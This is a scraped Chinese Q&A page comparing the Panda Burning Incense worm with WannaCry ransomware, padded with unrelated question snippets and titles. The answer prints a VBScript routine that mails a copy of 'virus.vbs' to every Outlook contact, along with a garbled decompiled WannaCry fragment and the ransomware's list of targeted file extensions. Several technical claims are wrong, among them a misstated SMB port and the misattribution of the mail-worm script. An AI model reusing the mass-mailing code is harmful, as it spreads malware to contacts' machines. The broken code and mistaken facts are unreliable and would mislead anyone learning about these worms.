问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

电脑病毒比拼,比特币和熊猫烧香有哪些相似与不同?

发布网友 发布时间:2022-03-30 03:22

我来回答

1个回答

热心网友 时间:2022-03-30 04:51

近年来的病毒,这里特指蠕虫病毒。

Stuxnet蠕虫,MS10-061,当蠕虫值入机器后,把自己设置成开机自启动,并释放驱动文件,把该驱动设置为服务自启动。该驱动负责突破系统TCP半开连接数*,以方便蠕虫通过网络传播。感染系统的可移动驱动器(即U盘等),可通过U盘传播自身。通过MS10-061打印机服务远程代码执行漏洞在局域网传播自身。并尝试利用一些弱口令企图猜解并取得主机权限,危及整个网络的安全。为计算机设置了一个后门,不断尝试连接远程黑客服务器,收集用户信息,接收黑客指令,并可获取黑客远程服务器木马并执行,带来严重安全隐患。

熊猫烧香对我来说有点久远,虽然我有初始的蠕虫病毒,但没有解析关键的代码,只从网络中找到说是变了50次的变种一部分。

 Set objOA=Wscript.CreateObject("Outlook.Application")

创建一个OUTLOOK应用的对象

Set objMapi=objOA.GetNameSpace("MAPI")

取得MAPI名字空间 For i=1 to objMapi.AddressLists.Count  遍历地址簿

 Set objAddList=objMapi.AddressLists(i)For j=1 To objAddList. AddressEntries.Count  

Set objMail=objOA.CreateItem (0)objMail.Recipients.Add (objAddList. AddressEntries (j)

取得收件人邮件地址

 objMail.Subject=" 你好!"  

设置邮件主题

objMail.Body="这次给你的附件,是我的新文档!"  

设置信件内容

objMail.Attachments.Add(“c:virus.vbs")

把自己作为附件扩散出去

objMail.Send  

发送邮件

Next  

Next  

Set objMapi=Nothing  

Set objOA=Nothing  

这块是源码的传播方式,其实是劫持了邮箱的账号密码,自动发送邮件给好友,其实附件带的就是病毒复制体了。与最近的比特币病毒相关的也只有在局域网中通过455端口迅速感染。

它的感染方式主要是通过下载,病毒会删除ghost文件,并对文档的图片进行更换,不会对文件造成损坏。

而比特币病毒不同。

WannaCry木马利用泄漏的方程式工具包中的“永恒之蓝”漏洞工具从MS17_010漏洞进行网络端口(455端口)扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry木马进行感染,并作为攻击机再次扫描互联网和局域网其他机器,行成蠕虫感染大范围超快速扩散。

木马母体为mssecsvc.exe,运行后会扫描随机ip的互联网机器,尝试感染,也会扫描局域网相同网段的机器进行感染传播,此外会释放敲诈者程序tasksche.exe,对磁盘文件进行加密勒索。

V1=0;

Do

{

P_payload=&payload_x86;

If(v1)

P_payload=&payload_x64;

V3=*(void **)&FileName[4*v1=260];

(&v11+v1)=(int)v3;

memcpy(v3,p_payload,v1!=0?51364:16480);

*(&v11+v1)+=v1!=0?513634:16480;

++v1

}

While(v1<2);

V4+CreateFileA(FileName,0*8000000u,1u,03u,4u,0);

这个就是利用MS17_010的数据了,这个锅只能背给不更新补丁的人了。

木马加密使用AES加密文件,并使用非对称加密算法RSA 2048加密随机密钥,每个文件使用一个随机密钥,下面就是密码学的概率了,就和当初二战时期德军的恩尼格玛密码机一样,每一天的密码算法是天文数字,除非得到密钥,其余不可能破解。

熊猫烧香是不会损害文件的,但这个是可以的。

.doc, .docx, .xls, .xlsx, .ppt, .pptx, .pst, .ost, .msg, .eml, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .jpeg, .jpg, .docb, .docm, .dot, .dotm, .dotx, .xlsm, .xlsb, .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .pptm, .pot, .pps, .ppsm, .ppsx, .ppam, .potx, .potm, .edb, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .asm, .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot, .stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der

这些都是病毒会攻击的文档后缀。

和熊猫不同的是,它会通过tor匿名,监听9050端口,通过本地代理通信实现与服务器连接。

近年来电脑病毒比拼,比特币病毒和熊猫烧香有哪些相似?有哪些不同?

所以才会让熊猫烧香,这款病毒轻而易举地侵入到我们的电脑当中。但是比特币病毒不同,他是在最新研究出来的最新的代码,大部分的国防及人员对这种病毒的构造一无所知,所以比特币病毒的危害程度,要不熊猫病毒有强大一些,制作难度也要比熊猫病毒要强。3.破坏程度相同 但是不可否认的是,这两款病毒都为...

电脑病毒比拼,比特币和熊猫烧香有哪些相似与不同?

和熊猫不同的是,它会通过tor匿名,监听9050端口,通过本地代理通信实现与服务器连接。

比特币病毒和熊猫烧香谁厉害?

熊猫烧香也是曾经让很多人深受其害的病毒,但跟比特币病毒相比,确实是“温柔”一点,熊猫烧香毕竟没有要文件赎金,让用户感觉被绑架一样。互联网时代,我们的重要文件资料,绝大多数都是存储在网络上,比特币病毒正是看中这一“商机”,展开了这一轮攻击。更有“商业头脑”的是,支付比特币这种虚拟货币...

历史上最负盛名的电脑病毒 还记得"熊猫烧香"吗

磁碟机病毒又名dummycom病毒,是近一个月来传播最迅速,变种最快,破坏力最强的病毒。据360安全中心统计每日感染磁碟机病毒人数已逾100,1000用户!“磁碟机”现已经出现100余个变种,目前病毒感染和传播范围正在呈现蔓延之势。病毒造成的危害及损失10倍于“熊猫烧香”。磁碟机病毒 7. 超级工厂病毒(2010...

什么是熊猫烧香?

"熊猫烧香",跟灰鸽子不同,是一款拥有自动传播、自动感染硬盘能力和强大的破坏能力的病毒,它不但能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件。该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中...

熊猫烧香的由来

“‘熊猫烧香’和以往的病毒不同,它采用了一种新的传播手段。”史瑀说,传统的蠕虫病毒是通过一台中毒电脑传至局域网内其他电脑,而“熊猫烧香”在整合了所有可利用的传播漏洞之外,还可以通过网站传播。感染“熊猫烧香”的电脑,会在硬盘的所有网页文件上附加病毒。“如果被感染的是网站编辑和记者的电脑,那么通过中毒...

历史上有哪些著名的电脑病毒?

同年,还出现了尼姆达病毒,它打破了速度的记录,成为了当时传播速度最快的病毒,它从开始传播到大规模办法,仅仅用了22分钟,就是吃个饭的时间。它让很多服务器直接瘫痪。网络史上出现的病毒可以说还有很多,像对中国影响很大的熊猫烧香向前段时间肆虐的支付病毒,可以说实在是列举不完的感觉,使用网络...

什么是灰鸽子木马?和熊猫烧香病毒有什么不同?

随着灰鸽子服务端文件的设置不同,G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有进程中。灰鸽子病毒其特点是“三个隐藏”——隐藏进程、隐藏服务、隐藏病毒文件。该病毒采用“熊猫烧香”头像作为图标,诱使用户运行。该变种会感染用户计算机上的EXE可执行文件。被病毒感染的...

流行的电脑病毒有哪些?世界十大电脑病毒

世界十大电脑病毒9、熊猫烧香病毒:损失上亿美元熊猫烧香(2006年)准确的说是在06年年底开始大规模爆发,以Worm.WhBoy.h为例,由Delphi工具编写,能够终止大量的反病毒软件和防火墙软件进程,病毒会删除扩展名为gho的文件,使用户无法使用ghost软件恢复操作系统。“熊猫烧香”感染系统的*.exe、*.com、*.pif、*.src、*....

熊猫烧香的由来

“熊猫烧香”,是由李俊制作并肆虐网络的一款电脑病毒,熊猫烧香跟灰鸽子不同,是一款拥有自动传播、自动感染硬盘能力和强大的破坏能力的病毒,它不但能感染系统中exe,com,pif,src,html,asp等文件,它还能终止大量的反病毒软件进程并且会删除扩展名为gho的文件(该类文件是一系统备份工具“GHOST”的...

电脑病毒比特币 电脑病毒勒索比特币 2017年电脑病毒比特币 和比特币相似的那个叫什么币呢 炒比特币提示有病毒 电脑中毒勒索比特币 病毒比特币 比特币病毒吧 中了比特币病毒解决
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
apkbuilder在哪个目录 重点调查和典型调查的区别 中国人寿儿童保险没考上大学能领取奖学金么 请问,ipadmini2的WLAN和WLAN+Cellular有什么不一样? 什么是关税同盟福利效应 p社大战略游戏《维多利亚3》定于10月25日发售,你对游戏有 关税同盟分类 关税同盟定义 十大小龙虾餐饮品牌排行榜:簋街占五分之一,最后一家口味更是独特 耽美直播类推文 如何在微信里拍拍好友 一个人如何为自己拍出全身照(半身照)定时拍照试过吗 明星的这种全身照一般是怎么拍的? 用手机自拍怎样把全身都照下来 影棚拍全身照最少得多少距离? 这种全身照照片是怎么拍出来的? 全身照怎么拍好看 全身照怎么拍出来的 拍全身照怎么那么丑 拍全身照什么镜头好 有没有一个P图的工具能把照片变瘦?? 手机拍照下载什么应用程序可以照全身? 拍全身照让腿变长的是什么软件 请问是什么 手机怎么自己可以把自己进行全身体照相? 拍照软件推荐 用什么手机软件可以自己拍出全身照啊,求大神解答! 电脑插好了网线后无法连接到Internet 笔记本电脑插网线明明有网络却显示没网络? 新电脑插了网线连不上网 当年的熊猫烧香病毒和现如今勒索病毒谁更 熊猫烧香和勒索病毒的异同及对网络商务的警示分析 剪映里面的视频发布抖音会和别人一样吗 抖音里面的剪影在哪里 抖音剪映里那些动物边跳边唱是怎样剪辑的? 如何在打游戏的时候把消息变成弹幕? 华为手机怎么开启弹幕消息 梅艳芳是因为什么原因去世的? 华为手机弹幕设置在哪里 华为手机玩游戏时消息变弹幕 折多山实时摄像头监控在哪里看 为什么华为手机不弹消息 华为荣耀9弹幕怎么关 华为p9怎样关闭弹幕广告 华为荣耀8x手机弹幕通知怎么设置? 华为荣耀50 pro显示黑字幕怎样调节 微信帐号密码号是多少 微信可用手机号码注册,忘记密码怎么办? 注册微信账号和密码 新注册的忘记密码,也没绑定银行卡加的好友,好友验证都失败了微信里有好多钱呢急急急